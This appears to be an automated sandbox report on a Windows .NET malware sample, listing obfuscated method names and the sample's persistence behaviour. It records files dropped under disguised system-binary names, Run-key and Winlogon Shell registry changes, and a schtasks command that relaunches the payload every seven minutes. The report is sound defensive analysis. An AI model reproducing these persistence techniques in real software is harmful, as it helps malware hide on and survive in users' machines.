                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, lvWI7xYujmbx7Kfbavk.csHigh entropy of concatenated method names: 'f7UYpIlaPo', 'hSyYRKjEgT', 'z6LvhO268wxCSVOqw8Km', 'lXEjb226eUXWmJPo3Wve', 'DEOQTb26ngeW7ybq0lvp', 'UB5YBsu6ld', 'hBXYiErERl', 'rUMYJAL9xj', 'lUeYc2TIh8', 'ihIYFvC5P9'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, mGYX6iCuyYEBASY6hNx.csHigh entropy of concatenated method names: 'nhKCxDsY8Z', 'i55CzkmekL', 'I6ACBaepAM', 'VCPCia8kS4', 'UMMCJiMLBc', 'BLZCcxnnrY', 'DmdCFnhNcU', 'LvsC3fk8YM', 'GV0CbgXUJ3', 'meZCVkH4iS'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, ickxQJaDDBQq2kyr7h1.csHigh entropy of concatenated method names: 'vdlQlPBX5u', 'r9M1NI2V0wmaVh17eyDt', 'xkC5kh2VyhABJgTTYZjh', 'Ae9Jat2Vmhw8RFclDfMH', 'kt5', 'y42aE2mEuN', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, zTgVwif1xxQVT7Abbau.csHigh entropy of concatenated method names: 'GJS1YP2pYrxfXi1SN0Hx', 'Gj47472pdKirXtpY1qfJ', 'iAJexY2pmiBL1hOIC8ME', 'BFKI9r2p08nfihUOrQto', 'h2oxmo2p2G2yjTadYM14', 'URwjha2pIJvIw5mCh4eH', 'kq2GS22pgGYmNffvGyIe', 'jpdlSJ25zl5tsWwYAEKg', 'a1VCiA2pZuWB7lh37ICo'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, MtSm9esiSKvHPIrjjtM.csHigh entropy of concatenated method names: 'HykscUm8Id', 'siLsFiSlXF', 'sYws3KMXSH', 'wGRsb0UtBZ', 'LpasVgi1Ti', 'ArjWiq234PckUFaJXnwO', 'JHGZOD23zR9nUPb0d09p', 'XRx624237G5oGDorbPO3', 'WN7Dcs23xB4D5x2WsbWq', 'HObF1V2bZAanqsOvMosX'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, f8IvbHWnBDwhCWcDD1c.csHigh entropy of concatenated method names: 'GsRo2k0xLk', 'x2fOac2BhkmQfc22lohm', 'hRb8XR2BfdtnajNSNSq7', 'LhWsQ42BuOHaluXdBIdE', 'yt1qi12BBQ6jdJNN588p', 'MJtWGAwCM1', 'FcxWLjQDxp', 'QVnWOUyohy', 'UCuWNx3eDk', 'IG1WTGUGwP'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, Ty1fK4qIF8ERWMLx1Lt.csHigh entropy of concatenated method names: 'q4mqyNNF4I', 'XHJqmLFYbd', 'GOAq0JOXKr', 'babqYsBqD6', 'f1WqdUb5n1', 'aWcqqC3qn8', 'otgqUmosnI', 'gkPq82gG7g', 'uaYqemNWXY', 'dfxqn7OD7w'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, Srks6KmLr7VhKT28xeW.csHigh entropy of concatenated method names: 'k0xmC1Gmvx', 'ChfmPxEVda', 'S43mwbmUY6', 'wEeALm2viomtmGuyhZQs', 'AcnQcB2vJCsgBasoccKj', 'TZpxoG2vhaswYRm9plC3', 'r4oTg12vByIifZsuAbva', 'v0lmo5KNkv', 'uphmHncp6V', 'XoIlFZ2vSFnpjAvyAbLb'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, WVhPeoCgOpZmtleEi2F.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'rUMCmvhann', 'Write', 'd7ZC0QZ1CR', 'CGSCYkZ6CV', 'Flush', 'vl7'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, osnNcFD8crq3ekDOJi3.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'zFr2dWmZp01', 'sM02dEPCDBF', 'wUd7ZX2hdJ97TYZTZIuJ', 'xXRHns2hqlhfURX4cXqO', 'H63gvZ2hUZ7QuaF0njtb', 'skN6Rj2h8GiVH8AioKV1', 'qMC26A2he8F5ZLo9Befs', 'w6ta4R2hn4LqDUixF4W7'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, QSv13CImiI5o3mmfKnV.csHigh entropy of concatenated method names: 'tA0IYl1i7Z', 'B4XIdKN6qs', 'gscIqEL90D', 'CrYIUL2XL1', 'iJZfSr2PGQaY4sGiBCkR', 'S62RJf2Pn3LrGSdgUWMD', 'eYt4IL2PlN0LSChYDIPw', 'MDqinf2PLE5psvwX86wx', 'scCZQf2POADamm3I6BMb', 'sK3e8N2PN5GR0R1j2IG2'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, J8AjFSQbgy1ZtjU95ZZ.csHigh entropy of concatenated method names: 'bXFQrZZZ5A', 'k6r', 'ueK', 'QH3', 'nASQke2j4Q', 'Flush', 'Rk3Q5BP84x', 'tZGQpCFD4s', 'Write', 'kwOQRewNRc'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, TbjJIF2kdl3JWNwk36X.csHigh entropy of concatenated method names: 'P9X', 'HLj2pRrceP', 'eC52dZea1VQ', 'imethod_0', 'ltC2R0X7Wp', 'qZZCIS2CRUYY8pPIVVb4', 'nLHAmZ2C5RlHbk6OJ7cP', 'SpOV0y2CpSQdcNMGJ3qG', 'fxAhCo2C7lD5PE4aAE7D', 'F2mNBe2CxATVPJdRnmf0'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, l88VT8Q1eosOgU4Enya.csHigh entropy of concatenated method names: 'Close', 'qL6', 'Fs4QMoXri8', 'iDMQtCrYlF', 'prMQSgpEJ7', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, UmFSJMm6svgqXUgq77G.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'Tmh2y8GhyZ2', 'USlmK0iSCK', 'imethod_0', 'fVsdFo2vF4WRMfA9I6jn', 'qTR17O2v3pXZsnlqjs6T', 'MWJXLW2vb5rxCp4D4uFG', 'vb6tnY2vVv7uNCPZRnDL'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, KBvrI5gbSMVIjV5IF6m.csHigh entropy of concatenated method names: 'WItyg1lQp9', 'baGyyiY4pC', 'KkPymrjayQ', 'PoZnTJ2sdOZymuop8i02', 'Ofu7PR2sqtNBFwNV9svP', 'Qwiq1Z2s0lj6WNXWstZI', 'Ra0OUd2sYdTTpm2xjmev', 'Sidy8yCGjC', 'HjcTe72sn5tIuPN80Alu', 'UQWLi62s8yZoKk9TYKwy'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, wxbAwPkMW7gI8omkVtq.csHigh entropy of concatenated method names: 'RYx2d9MgONc', 'BpD20jLs5kC', 'aPMiTm2Ro70W9ph5oNKM', 'OJXWDF2RHEpRVRmnypE0', 'PwfA272RjBSvhEig2Eyq', 'B1BWfN2RwqRjEkZfJ6X5', 'MrDinx2RCS8dRiuou2ux', 'zOTTP52RPiOLd7B7pB5v', 'ovrnuu2Rsr08e41QJPUW', 'imethod_0'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, oJicmhjo50K8qHAg9l5.csHigh entropy of concatenated method names: 'zR0jjdwr9Z', 'Olyj9lKfKp', 'JSkjCbhI8B', 'YIKjPLET63', 'XvBjwqyK5J', 'uo0IOD2JmVPFgL1Kvlwj', 'QcTsYj2Jg1MgkNCAyrvJ', 'cfBNg32Jyj6UOHuhnNaq', 'GThrVW2J00qLpsVGLB4s', 'fICpVO2JYtqgyd35sgbY'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, hvGrHVpnySCR8498IJ5.csHigh entropy of concatenated method names: 'rXvpLAJGP7', 'Cm0pAFxrOb', 'FYmpWmHpeP', 'yvgpEDswuY', 'seHpoqIDSO', 'ExZpHsQCGY', 'maepjRPDQg', 'Qsfp9FeXKx', 'Dispose', 'XPeKWP27ooC6tyHxB4hG'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, Qw9CqYYvAejBEmRufXZ.csHigh entropy of concatenated method names: 'eHvYQJaS6G', 'iX1Y6LG8iL', 'HSQDbw2Q5SolIpOw8nVZ', 'sDaxEl2QrGu1lNI3pgFe', 'MKh83f2Qk6hunbr7e6TU', 'uBf2r12Qpmg5K9PNdc04', 'gVjvn82QRp48TvjofJuN', 'giT6rR2Q7el5hNDmO7vh', 'hbIWyv2QxWCUF6WYkfIs', 'KsD8wi2Q4ZAiXmtynQIC'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, Wef3LRSRuk2qZthm7AQ.csHigh entropy of concatenated method names: 'HVISxruFRR', 'ErtS4wgXC9', 'c3eSznERCa', 'eYWfZHSxxd', 'q6Wf2wSTOV', 'O3WfInmXS6', 'mYffgkOkXD', 'XX0fydmgU5', 'UoefmonZiY', 'ImWf0FYMbI'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, CdGxl9RZVebOvqn1fR2.csHigh entropy of concatenated method names: 'qKSRywXS4r', 'vQmRmbITYd', 'MjJQBB274B0UZF66cQrr', 'uviEBY27zlTO3YgwK5WI', 'glAqKB277FvE47hm74NV', 'WldPqk27xdqw1Cg91rn7', 'HmSand2xZwVtJ11w392B', 'QRadAZ2x22rwUsMKNrYB', 'LwWRIpxUwd', 'qeH9vU275XkJ429SGvBS'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, tWAlNqmVNgUWWeH9W0U.csHigh entropy of concatenated method names: 'Ogrm7maFCk', 'ES4mxZDaBJ', 'Kf1m4vDLfo', 'ABxmzluil0', 'j8U0ZSNGxP', 'CgI02S5ffX', 'gAN0Ia1RCj', 'Q5y0yn2aGtGsr1W0oJ7n', 'QlBAyw2aLlN8fraTTL04', 'KdnOEp2anV8lunDMk0lj'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, AYyCBEqohmwSlkGM8BU.csHigh entropy of concatenated method names: 'RysfIe2MtDZQ05kx20tu', 'KDlFsd2MKwuGwjdcPixl', 'JeNUdR2MMdcRugR7Wfps', 'g4Tl43yM9R', 'K22LUw2MhZv6JUSTOeI7', 'y777TT2MfMsPAeekDiUV', 'wmTUF62MuGRA73p9RbHL', 'v45RoI2MBVUBRRkMYxqh', 'pBC8ff2Mix6Z2Zqwcgff', 'SDvG2eXY8S'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, toAgKoSvsd0ZJTpNnEf.csHigh entropy of concatenated method names: 'oa4SQreZ8h', 'jC7S6YL4EM', 'iFKS1jScaw', 'kYISK8oP3F', 'llwSMcqUul', 'j3yStKNqEJ', 'aTmSS21Oei', 'Mo1SfglcBw', 'oeJSuMJxuq', 'nmeShqX25M'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, SKkjl9HBD3XZtOdS2g3.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'SYUHJfLcxk', 'lrjHcO2XTX', 'Dispose', 'D31', 'wNK'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, uZdxmFG8NuuI38Ruyk4.csHigh entropy of concatenated method names: 'Dispose', 'dPEGnHkGOk', 'fvUGlmIx1y', 'dPRGGSWvrP', 'b2a2IJ2MzOUGVwTh1tZu', 'xZnsRQ2tZKIh0nS69RBH', 'nY5mlQ2t2Mkhp6P3FhQT', 'dE7ixJ2tITBB657kwlV9', 'TCpHqK2tgyFZBWtXb28g', 'JV2Dn12tyncPQI6lMybA'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, VHlclS0HsxGII7KaSfm.csHigh entropy of concatenated method names: 'lJm0vUl6Df', 'OX1M142auvcSbFa16QmZ', 'cVTlo42aSfXlY2cxKg6X', 'aeWpDP2afeQ2XU443Wf4', 'yUfUEx2ahiaRs36kBVAd', 'gD0r712aBGwJX1o9ohk7', 'E94', 'P9X', 'vmethod_0', 'UDs2yXk6wAp'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, qRwlJgg9vDq0cYJUawU.csHigh entropy of concatenated method names: 'Ju7gh7AxGA', 'WvIgBOekXX', 'Uqcgix4UcR', 'fEaLex2wFowfnNckyi6O', 'JLYdJO2w3fQP5Atis6w3', 't4ex1s2wJmqR0g2fDXK8', 'yLOqkT2wc2B7wbTJNZGX', 'pmVgPkuDot', 'qDrgwLXESH', 'G6FgsQrT81'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, XC2FdV24h7kCEdrpBjD.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'Gah2d2WdfGT', 'K7V2y23yiSC', 'XvjGqe2PZ45mU5hCoHsR', 'mfVUTg2P2TMCWKDxh3Cq', 'akcySj2PIgVBeSebpOxE', 'RC4YST2Pg8mjcMhXkyKM'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, AVpsF7xTGAI35np3icj.csHigh entropy of concatenated method names: 'nyYxwlXrXg', 'Ib8xsiqNff', 'fUPxv2tthl', 'LrgxakWbch', 'n5yxQc7EK0', 'V5Tx6Z63gY', 'Lvmx1bTW3P', 'tmfxK3eBJx', 'krnxMcALRT', 'u2IxtYXyPL'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, WgDGxkD2yWtttoET65H.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'c0C2dAjGEAq', 'sk82dXpeTNd', 'N2dtJD2ukDU5anyLXBPp', 'yqGs8d2u5v2FDfpQiGJn', 'XOWHZp2upCH0mg94jGq4', 'o8jif52uRpVAPTSwrmn7', 'n8jAZt2u7979pslOEQJN', 'bGpt4W2ux9QmFDBsBjCb'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, rfA2AjyjScoc2qjjwIw.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'YLw2dgcynKF', 'K7V2y23yiSC', 'fT8CDs2swvILcvd2NsNR', 'ROZLKD2ssBW2o5vainu7', 'bakfgT2sv8nGMpQh4bgD'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, FbwWikK17HjWWnERbUK.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'I1eAa52rVu72bfNNdP6q', 'HW7nTu2r3GrOpJsoDuOM', 'OMoXyD2rb0JwS9TGquom'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, OoMv4MtiM0pA6jkFG9j.csHigh entropy of concatenated method names: 'OUs2dHyU6X3', 'es4tcmW9lG', 'l10tFJmIbX', 'r2jt3i2YfY', 'hQejwo2kivbSj8cQHQDb', 'V8epTo2kJP28R0EQfV8t', 'sS1qxi2kc8eIOUYnF2nG', 'a0y27f2kFDkvJ9eee0u2', 'GxWlnw2k3B9mNwpVg5TH', 'aeHDRp2kbmS9bJ7cPRyB'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, tQdJj5Nm3YUN61UElT.csHigh entropy of concatenated method names: 'eNm6ssZCI', 'oNQ3n4296YvSmg5dM0r7', 'vQHBbq29aeYd9Wt4XiCX', 'GQLWvi29QgUhaDlc3juu', 'Eb4ANxSns', 'rUpX7PnD3', 'Ar6DrSuiC', 'QvmWWILw1', 'bpOEZfeMV', 'lRLonCHSP'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, hsAEuHIbWm3Buc9Arfw.csHigh entropy of concatenated method names: 'kTxgYytMme', 'iHriBD2wy4w9Ws4Hk48C', 'w5NKeC2wmlqOQXofqG6L', 'VIJCpV2w0TOn8VZUymiy', 'XxD8bl2wY0TQjjHCttyA', 'KPyfvJ2wIdm2hPA7GeNO', 'fCQIM32wgpTUxsoNR8Sk', 'L4avAy2wdAfIthiVdZDE', 'B8KG2C2wq7DoBl3klah0', 'XqOgZVNe8Z'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, HW6aHFAPr4FjLunAd35.csHigh entropy of concatenated method names: 'RsQAKarJSs', 'htKspJ2f8fFGOfl0tbd1', 'S3d7BA2fq4nTBOwd8LPv', 'KCDcMb2fUJXQbqHBJTwm', 'Wttl482fe4tE3cQ9WMWq', 'Iw2AsKiUyY', 'A5RAvZIbQs', 'zd3AaTv74u', 'V16uby2fmEhF5m7H9SVk', 'jXZdqC2f0Nw8p172ABHy'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, YjhQ34dUUWdJqY9GsE6.csHigh entropy of concatenated method names: 'aL0de5cUb5', 'FBddnOuyoH', 'TpAdl5yBaL', 'wnXPVT26oJebLVL5XZZD', 'tBPuLA26HdoMcXehkG50', 'KdkBT126WekEYoUBH0mH', 'd43Fte26E7ASYid4raMr', 'LpcmIs26jBXkw1Abv00y', 'RLFaGi269Sxqa6R90r0a', 'CN2aFB26ClyXcNStyKuR'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, jWHm3l0604kjATqG9Xk.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'S1h2dUnKbEG', 'K7V2y23yiSC', 'j6HCO72aJuCqIiyH8Sue', 'p7h0Vq2acAu3EiLg4NG7', 'LFMrMM2aFRalbZUMHpY4'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, AHUTkiwvJVFKxYeZHUu.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, nXSHg9Xlf7DJN4RpgP4.csHigh entropy of concatenated method names: 'NhXXXLm9Cp', 'YHKcp02uZCYl0ENn8UFj', 'bu8rgE2u2Il2iWh56Arh', 'pmyUY52f4TiRAKqBNQja', 'lnI4gT2fzl4Xp1e74j9I', 'b1iTnC2uInY8rN2Z4JkO', 'nA4XLBKK0u', 'FWqloK2fpY4VZV9Cp9Xp', 'DJVFBB2fkFBCVt7cpPf6', 'qiFyFI2f58nm7MRLhEDE'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, AkoqAkPrhcvqaEMIRlI.csHigh entropy of concatenated method names: 'QFkP5J56vd', 'PbPPp5wnmS', 'AC8PRFfVM7', 'gWnP73rL8y', 'P8bPxuhgYV', 'fJ2wJx2FgCHxZDVaK4hk', 'Fmk9k32F2rp9CHjbheOf', 'sPSQwV2FI1AZ7bmFqa0u', 'qVESld2FypbFRbFS0BlS', 'JGWXlS2FmgKkDA4YEWr3'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, JsyYdHP40mmbJAN8wo6.csHigh entropy of concatenated method names: 'o3kwZctGJQ', 'XLdw2n837B', 'xqTwIPKXse', 'GX7wgpt3PL', 'vQdwyOHnhR', 'ca0wmhYTJR', 'qUIZud2F8P3oE3WyVKA3', 'bZcBBI2FqZbndooXXOyC', 'fmOVJt2FUydh0QNnFvHO', 'i3m9v52Fe9XrE5HNpBV0'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, rj73Ft6bjwFI3K7R7CF.csHigh entropy of concatenated method names: 'XSNZQO2rDgqdZvmFYOBE', 'bae3mL2rAnRtOKybnIqP', 'u0NlYH2rX17tMJKOE2r9', 'ThGTRs2rW4KTDJmF73d9', 'N3f6r9eWQZ', 'Mh9', 'method_0', 'Y7S6klTyVQ', 'uFq65c6baV', 'Svp6paa0Lg'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, Pg35RcY2OqpQtfSYmVf.csHigh entropy of concatenated method names: 'yr0YgenwM1', 'qDlYyOGUUg', 'bxfYmZLuB8', 'JCZc412Q8lNJ4y40KHeA', 'j2cYwP2QqixBXKtRd16N', 'LuNlEc2QUjpi0FhS2jcx', 'pTCUYD2Qe1qbDJVT6OXi', 'IPn2V62QnpU4TWPo3xqF', 'T8xACZ2QlIqqNSMy6aoF', 'WtOXDk2QGiHRF2KApnyD'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, XT37q29vFnrwgRB2BBt.csHigh entropy of concatenated method names: 'method_0', 'RUI9QuRoEW', 'o2m96p1rap', 'q7f914ZguD', 'PLj9KZV0WM', 'Nqa9MIYT8G', 'rT49tLu9eW', 'L7fk8J2J1UPVVRqDRoBo', 'qdLFwU2JQyFAlA4TqDh2', 'qQsI4U2J6OTfo3XkKt15'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, zaZ0YfAkuIw6HegpZX5.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'IN22dn2LZH2', 'Df72yJ28YuA', 'JqYqia2fsXNWFaAoM4fe', 'hRajvF2fvuCZj4fAPoaD', 'zmZCJo2faaubpZg4OyFs', 'GxBAHg2fQ7h7OWXsmTDH', 'gQGaBw2f6mJf6GMZaU0V'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, CfAecytqfujxxU8Luys.csHigh entropy of concatenated method names: 'pj4tHuYfYZ', 'Wsw7x42kauMRDQd5mCVr', 'rZ1Ui32kQe50RS4esZ5t', 'rxjg4s2ksRyTL4FU5B6D', 'qqFsRD2kv2ElHDbZ3Uyf', 'mYbUNA2k6k3u1HLLFl3E', 'IPy', 'method_0', 'method_1', 'method_2'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, iC9iJ2s40mBbr836qpX.csHigh entropy of concatenated method names: 'KfJvZWqqCd', 'A5Bv2n6kca', 'Yd7', 'GNxvINM51Y', 'U7gvgdd82R', 'm1EvyDYKW1', 'wUyvmShiob', 'BrLT862bqQXhla88EkbI', 'utwBpF2bU4pvS2CcnJjZ', 'vOVSuS2b8LyujaGA0CKO'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, TSLPXZxSm9iEaDAau7u.csHigh entropy of concatenated method names: 'zhp20aVPEdi', 'D5Q20QQaZhx', 'HJB206k29we', 'qJ8201qaew4', 'Oro20K6Vf2b', 'YDp20MI8Mk2', 'pqc20tuQ9xl', 'gTY4mw0X4T', 'BV220S3WpXk', 'klS20fndsVM'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, McIVxKwfrIRMfforS7r.csHigh entropy of concatenated method names: 'qPdwhVe2yS', 'OOywBiNkq0', 'qcpwicwFAF', 'uJgwJOhZmy', 'BJQwcQUc3w', 'vyEwFwTqQY', 'p3Pw3TgwVj', 'J11wbAiqoj', 'P7FwVJrPv6', 'poIwrXjGAu'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, wyBPKNGEtagDJ1ctY0C.csHigh entropy of concatenated method names: 'XYBAn1RE1H', 'ShYAlw98vy', 'Gq90pK2SVYFRxIL2bP4s', 'fPutLj2S3Cxrx9r5BnWm', 'WbYo0r2SbXMBVFtMK3db', 'EWcpKa2SrAEFJ3sR1kDg', 'lradqO2Skbcht2118X58', 'LIGAARcDeR', 'MvM1h52S738tsj87mtS5', 'SKahxL2SpQ8IU6O2KiwS'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, mtHJExmqLjcHW3q7dic.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'rd82dmCH8IX', 'K7V2y23yiSC', 'wLMgd82vA5BiKOYVqakN', 'g8T9eF2vXtMTVY15dvEq', 'M32xfE2vD3tKDd1tDQpi', 'f5N1sL2vWVJBnpM8aUth'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, WHpYJQDLLNx1Eh0nRFp.csHigh entropy of concatenated method names: 'gKJFss2h6AwRR0EK2JCS', 'MF17FT2h1OPA6EN5U9uG', 'Awtedc2ha255HkZQL152', 'Eq18jv2hQSQFNAYXCuuL', 'method_0', 'method_1', 'P2TDNu35FM', 'T11DTvFmhh', 'cl0DAicquH', 'Bg8DXYtDFx'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, rYFE3bIvrpW8L7mgamJ.csHigh entropy of concatenated method names: 'MdfIup0uLt', 'Ls4Ihx6DEc', 'Tiyw4M2PhxTDiuZTVPBd', 'du0UFq2Pf3N27bRRbwdc', 'tXZJlf2PuA546abFHrmt', 'rh3aKc2PBG68e9sAGTeX', 'G21IchmPJo', 'tyuhXS2PFJtB3ra4UdlJ', 'eRSKud2PJxdm2p1ek7NE', 'VTbGVZ2Pc79VwGmyvT5Y'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, yDaau4dJohhkN85ktBd.csHigh entropy of concatenated method names: 'mDCdpn6cSF', 'c5Gtnu21eDa1SapV3OZJ', 'JrEcjc21nBhNYH1p1Wvn', 'vfphcG21lmV3PKLs9M4t', 'M7Zgnk21GWSxZmpfSwxN', 'P9X', 'vmethod_0', 'DhB2yCoUaQB', 'imethod_0', 'Dtgf5t21qWcDOCWdLGPl'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, K5InK7XBaYtKnTNPSM8.csHigh entropy of concatenated method names: 'kFoXJuWwHc', 'oqCXcjhFjS', 'z5TXFABn3J', 'uSItOf2uwUfp66Y9AcFd', 'S83scm2uCSZKKbILsftQ', 'JZY9px2uPeno7Ug0Kgmp', 'phq1B22uslcsL8wtTxAc', 's8uDbL2uvQ8byr0q0R9I', 'MZW4qO2uayWLX87TLZ7P'

                                    Persistence and Installation Behavior

                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File created: C:\Recovery\dwm.exe
                                    Source: unknown | Executable created and started: C:\Windows\Resources\Themes\smartscreen.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File created: C:\Windows\Resources\Themes\smartscreen.exe
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File created: C:\Users\user\Desktop\kwWqKlvO.log
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File created: C:\ComproviderComponentIntocommon\ctfmon.exe
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File created: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | File created: C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File created: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | File created: C:\Users\user\Desktop\etRRuFlx.log

                                    Boot Survival

                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreen
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Portsessionsvc
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQ
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQ
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon
